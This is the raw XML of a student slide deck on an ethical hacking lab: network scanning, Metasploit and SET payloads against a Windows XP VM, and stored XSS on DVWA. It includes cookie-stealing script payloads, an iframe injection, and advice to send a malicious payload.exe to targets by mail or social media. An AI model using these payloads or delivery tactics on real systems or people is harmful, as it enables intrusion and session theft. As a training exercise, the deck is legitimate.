      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272980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b="10262"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1156902" y="451415"/>
            <a:ext cx="9944236" cy="5581630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1167190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171410"/>
            <a:ext cx="10820400" cy="4024125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter the LHOST port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then type y</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600264" y="1743147"/>
            <a:ext cx="6905936" cy="4320637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398927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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>root/.set/payload.exe is the malicious file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute file can be done via mail, or by any social media.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once your target execute that code, a session will be created. Type sessions -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to get the list of sessions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2451994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b="9578"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="964101" y="428265"/>
            <a:ext cx="9930408" cy="5616354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1898054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2021" y="381965"/>
            <a:ext cx="9275359" cy="5801549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311450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1550" y="428264"/>
            <a:ext cx="9275359" cy="5801549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2517011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Project-3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>CROSS-SIDE SCRIPTING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The malicious script used in this attack can access user’s cookies, session tokens, or other sensitive information retained by the browser and used with that site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generally there are two types of XSS i.e. Stored and Reflected. We will try to exploit the web application vulnerability using Stored XSS method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5976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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open DVWA in your web browser by typing the IP address of Metasploitable 2 machine (192.168.248.131)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set DVWA Security Level:- Click on DVWA Security, in the left hand menu. Select low and click on submit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3824223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950" y="203079"/>
            <a:ext cx="6433962" cy="4024313"/>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131198" y="2215235"/>
            <a:ext cx="5943600" cy="3718560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3070136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456" y="863471"/>
            <a:ext cx="10820400" cy="4024125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> u are hack3d !")&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then click on Sign Guestbook and a dialogue box will appear. This script is used to generate an alert or message.</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332542" y="2071868"/>
            <a:ext cx="7265147" cy="4545374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159641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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>System security is one of the important thing in the present era. Learning to improve security and knowing the attacks is important as everything is connected to the internet. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>project is combination of three sub projects which includes Scanning the network, System hacking and Cross-side scripting. This is to train the basic ethical hacking required for getting into the system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>In the Network Scanning, we learn about scanning the target system from the network and getting details of the system. In System hacking, the hacking of a target operating system is done. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>we use active attack and passive attack onto the target system. We set the payload and attack the target system and to make the connection and get files from the system. Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3061226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180" y="863471"/>
            <a:ext cx="10820400" cy="4024125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click Sign Guestbook to get the cookies that is shown in the image below.</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b="10033"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124201" y="1840374"/>
            <a:ext cx="8344866" cy="4696662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="751542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479" y="979218"/>
            <a:ext cx="10820400" cy="4024125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://www.azureskynet.com"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click on Sign Guestbook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b="17776"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2800108" y="2037144"/>
            <a:ext cx="8921216" cy="4586420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1004445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a:t>Allow PING in Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://www.faqforge.com/windows/windows-10/how-to-allow-ping-trough-the-firewall-in-windows-10/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE details of exploit MS17-010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://www.cvedetails.com/google-search-results.php?q=ms17-010&amp;sa=Search</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSFCONSOLE commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NMAP reference guide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://nmap.org/book/man.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Setoolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reference and install process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://github.com/trustedsec/social-engineer-toolkit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3170148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2163" y="2350104"/>
            <a:ext cx="3473370" cy="1293028"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thank you</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128710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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Ethical Hacking project consist of 3 mini-project which completes the basics of ethical hacking and have a clear knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanning Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finding the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanning the ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability Scanning		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passive Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-side Scripting </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59761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setup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We used virtual machine VM ware for running the OS for the Ethical Hacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We used Kali Linux since it has many tools available for ethical hacking and penetration testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We installed Metasploitable framework for setting payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We installed windows XP for testing the attacks on that OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420806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Project-1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanning Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning is the process of identifying live systems, services and open ports that exist on those systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These were the steps involved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3299845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Finding the target</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ping</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019" y="2193925"/>
            <a:ext cx="6433962" cy="4024313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31721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Ping Sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>netdiscover</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019" y="2193925"/>
            <a:ext cx="6433962" cy="4024313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239264748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103</TotalTime>
  <Words>1130</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>100</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Century Gothic</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Vapor Trail</vt:lpstr>
      <vt:lpstr>Project On Ethical Hacking</vt:lpstr>
      <vt:lpstr>About the Company</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Abstract</vt:lpstr>
      <vt:lpstr>Components</vt:lpstr>
      <vt:lpstr>Lab setup</vt:lpstr>
      <vt:lpstr>Project-1 Scanning Network</vt:lpstr>
      <vt:lpstr>1. Finding the target Ping</vt:lpstr>
      <vt:lpstr>Ping Sweep: netdiscover</vt:lpstr>
      <vt:lpstr>2. Scanning the ports:</vt:lpstr>
      <vt:lpstr>3. Vulnerability Scanning:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Project-2 System hacking</vt:lpstr>
      <vt:lpstr>Passive System Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Active System Hacking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Project-3 CROSS-SIDE SCRIPTING</vt:lpstr>
      <vt:lpstr>steps</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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Ethical Hacking</dc:title>
  <dc:creator>nikhil nickky</dc:creator>
